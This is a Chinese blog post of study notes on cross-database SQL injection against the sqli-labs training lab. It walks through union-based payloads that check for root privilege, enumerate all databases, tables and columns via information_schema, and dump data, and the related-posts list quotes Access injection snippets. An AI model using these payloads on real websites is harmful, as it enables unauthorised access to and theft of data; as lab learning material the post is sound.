sql注入之跨库注入的学习记录

于 2024-06-18 16:34:54 发布
阅读量444 收藏 5
点赞数 10
文章标签: sql 学习 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dalaojiaoweb/article/details/139773532
版权

本人小白一个,如果有什么问题希望大佬可以指出,有什么疑问也可以在评论区留言一起讨论一下共同学习进步。

sql注入之跨库注入

跨库注入没有什么难点,主要是需要root权限

那么怎样判断有没有root权限呢?

我们依旧使用sqli-labs靶场的第一关进行一个测试

?id=0' union select 1,user(),database()--+

可以看到在user的注入点有root回显这就是存在root权限。

那么我们接下来就可以进行跨库注入了。

第一步:注出所有数据库

?id=0' union select 1,group_concat(schema_name),3 from information_schema.schemata--+

 照常的解释一下语句:

information_schema.schemata在这里面存储着所有的数据库名。

schema_name通常用来表示数据库中的模式(Schema)。数据库模式是数据库对象的集合,包括表、视图、索引、存储过程等。数据库模式用于组织和管理数据库对象,提供了对这些对象的命名空间和访问控制。

那么可能有师傅会有疑惑了为什么我们不用database()。datbase()不也代表数据库吗?

?id=0' union select 1,group_concat(database()),3 from information_schema.schemata--+

 在 MySQL 中,DatabaseSchema 可以互换使用,它们基本上是同一个概念。但是呢在跨库注入中我们尽量不用database。

第二步:读取数据库中的表

0'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='sys'--+

 接下来的注入与其他的注入没有任何不同

第三步:注出列

?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='sys' and table_name='host_summary'--+

第四步: 注出内容敏感信息

?id=0' union select 1,group_concat(host),3 from sys.host_summary--+

 总结:

跨库注入

跨库注入(Cross-database Injection)是一种SQL注入攻击技术,攻击者通过SQL注入漏洞,不仅能够操作当前数据库中的数据,还可以在同一数据库服务器上访问和操控其他数据库的数据。这种攻击方式可以大大扩大攻击者的影响范围和获取的信息量。

 等到了实战的时候各位师傅们就可以知道跨库注入的重要性了。

不会web的小白
关注
  • 10
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
access跨库注入
weiliang369的博客
02-22 489
跨库注入之逐字猜解法 跨库注入适用环境↓ 在B站点注入A站点。 前提,B和A在同服。 跨库目标位置 C:\Program Files\r3sec\#Data.mdb 判断存在的表↓ And 1=(Select Count(*) from [数据库路径].[表]) 实际判断表的语句↓ And 1=(Select Count(*) from [C:\Program Files\r3sec\#Data.mdb].[admin]) 判断字段 And 1=(Select Coun.
sql跨库注入
小飒的博客
06-07 287
靶场:https://buuoj.cn/challenges 的sqli-labsL1:首先看有什么数据库 完整url: 选择“ctftraining”数据库 选择名为flag的table 查询内容 采用报错注入步骤是类似的,最后flag显示不全
MySQL跨库注入
一个普普通通的博客
03-01 381
Mysql跨库注入
SQL注入跨库注入
剁椒鱼头没剁椒的博客
02-27 1234
该部分补充之前发布的SQL注入基础原理与案例中未提到的跨库注入。后续也会在之前发布过的文章中再逐渐补充未提到内容。参考文章跨库注入首先需要明确注入点的权限,若不是root权限或者管理员权限,那么无法执行跨库注入,只有高权限才能执行跨库注入。简单来说,跨库注入就是在同一个数据库管理系统中,在某一个点存在SQL注入,而通过这点查询到,该权限为Root权限,那么就可以使用这种方式去操作同数据库下的其它网站数据库,这样就实现的跨库注入
class2 跨库注入
qq_46185846的博客
02-18 228
跨库注入,新增知识点information_schema.schemata,存储所有的数据库信息 如果要应用跨库注入,有一个条件,那就是当前数据库用户必须为root用户,才可以对整个数据库进行操作 确定用户: user()确定用户 如果回显为root@localhost或者root@127.0.0.1只要@号前面为root,则代表该数据库用户为root 跨库注入过程: 第一步: 获取当前所有的数据...
sql注入网站源码
04-09
7. **代码审计**:定期进行代码审查,查找可能的SQL注入漏洞,尤其是在使用第三方库或组件时。 8. **Web应用防火墙(WAF)**:可以配置WAF来检测并阻止SQL注入攻击,但不应完全依赖它,因为攻击者可能找到绕过WAF的...
有效防止SQL注入的5种方法总结
09-09
参数化查询是预防SQL注入最有效的方法之一。在Java中,可以使用PreparedStatement对象来执行预编译的SQL语句。预编译的SQL语句在执行前已被解析和优化,因此在执行阶段,输入的数据不会被解析为SQL代码,而是作为...
利用SQL注入漏洞登录后台的实现方法
12-15
SQL注入是一种常见的网络安全威胁,它发生在web应用程序未能充分验证或过滤用户输入的数据时。当攻击者成功利用SQL注入漏洞,他们可以构造恶意的SQL语句,以操纵数据库查询,获取敏感信息,甚至完全控制服务器。以下...
sql注入之必备的基础知识
09-10
SQL注入攻击是网络安全领域常见的一种攻击方式,攻击者通过向Web应用的输入字段中注入恶意的SQL代码片段,试图对数据库执行非法操作。为了防御这类攻击,Web安全工程师需要具备扎实的SQL注入基础知识,了解如何构造...
sql注入之新手入门示例详解
09-10
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有正确地过滤或转义这些输入,攻击者就能插入恶意的SQL语句,从而获取、修改、删除数据库中的敏感信息,甚至完全控制...
高权限注入&跨库注入
hibugs
04-13 406
上篇文章中我们讲述了如何进行手工注入,也通过墨者学院的靶场,真实的感受了SQL注入的感觉。这篇文章我们将继续介绍SQL注入
SQL高权限注入(附实例)-跨库注入-文件读写操作-魔术引号-防注入方法
ran的博客
01-13 579
此次要进行跨库注入的目标是“Pikachu漏洞联系平台”,而上一步获取到的所有数据库里可以发现有一个数据库名称为“pikachu”,不难判断出此数据库即为跨库注入的目标的数据库。比如下面的数据库A是“root用户”,就可以对相关的网站B、网站C进行跨库注入,但是想要实现跨库注入,首先就需要知道数据库B、数据库C的数据库名称。进行上述操作时,文件路径里的斜杠最好使用“/”或者“\\”,而不是使用默认的“\”,因为在很多编程语言中“\n”代表换行的意思,可能因此会发生错误。
延时注入跨库注入
weixin_30369041的博客
05-03 78
思路: 1 mysql> show databases; 2 +--------------------+ 3 | Database | 4 +--------------------+ 5 | information_schema | 6 | challenges | 7 | mysql ...
旁注,跨库,CDN之——跨库
温柔小薛的博客
04-16 258
跨库 在我们进行sql注入的时候,经常会读出许多库。导致我们还需要在sqlmap里面使用“—current-代表”进行判断当前库是哪个。 Mysql的root、mssql的sa、oracle的sys 分别是其数据库中权限最大的账户。 一般情况下,各个数据库对于其用户权限分别对应相关权限。通常在注入mssql的时候会看到所有的库名,但是读表却只能读当前库的表名。这个时候你的权限一般为dbowner ...
Web安全--SQL注入--MYSQL跨库--ACCESS偏移
weixin_68243135的博客
11-16 518
SQL注入
WEB攻防-通用漏洞&SQL注入&MYSQL跨库&ACCESS常规注入
m0_65336233的博客
10-07 636
WEB攻防-通用漏洞&SQL注入&MYSQL跨库&ACCESS常规注入
Sql注入详解(原理篇)
最新发布
Naive的博客
09-11 1万+
SQL 注入漏洞非常复杂,区分各种数据库类型,提交方法,数据类型等注入,同样此类漏洞是WEB安全中严重的安全漏洞,学习如何利用,挖掘,修复也是很重要的。SQL 注入就是指 Web 应用程序对用户输入的数据合法性没有过滤或者是判断,攻击者可以在Web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
渗透之路 WEB漏洞【第二篇】SQL注入之Access
dfu65065的博客
09-05 197
Access注入攻击方式 主要有:union 注入、http header 注入、偏移注入等 Access数据库特点 (access只有一个数据库) Access数据库   表名     列名       数据 直接暴力破解 access三大攻击手法 1.access注入攻击片段-联合查询法 2.access注入攻击片段-逐字猜解法 3.工具类的使用注入(推...
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值